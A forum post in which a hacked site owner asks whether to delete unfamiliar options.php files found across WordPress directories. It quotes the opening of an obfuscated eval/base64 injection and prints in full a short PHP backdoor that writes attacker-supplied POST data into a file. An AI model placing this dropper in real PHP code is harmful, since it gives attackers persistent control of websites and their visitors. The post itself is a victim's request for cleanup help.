options.php in various directories

For some while now I’ve been having trouble with
<?php eval(gzinflate(base64_decode(‘pRn9c9o49ufcz
being injected into my site — enough that I’ve written a script to go through all the PHP files and remove it, but it keeps getting put back in. Yes, I’ve been hacked, and it doesn’t just affect the WordPress I’m running but also SMF, so it’s not that easy to work out where it’s coming from.

In trying to find how to stop this, I’m coming across files named options.php in various WordPress directories: the root directory of my WP site, as well as in wp_content/, wp_content/plugins/, wp_content/themes, and wp_content/uploads..

All of them are 114 bytes in size and contain:

<?php
if (isset($_POST['da'])) {
file_put_contents('options.php', base64_decode($_POST['da']), LOCK_EX);
}
?>

Since the malicious code is base64-encoded, I strongly suspect these files are related to it, and on downloading a fresh copy of WordPress, I found they also aren’t in the default installation. Before I delete them, though, I want to ask here whether I should indeed do that, or if the files do belong where they are.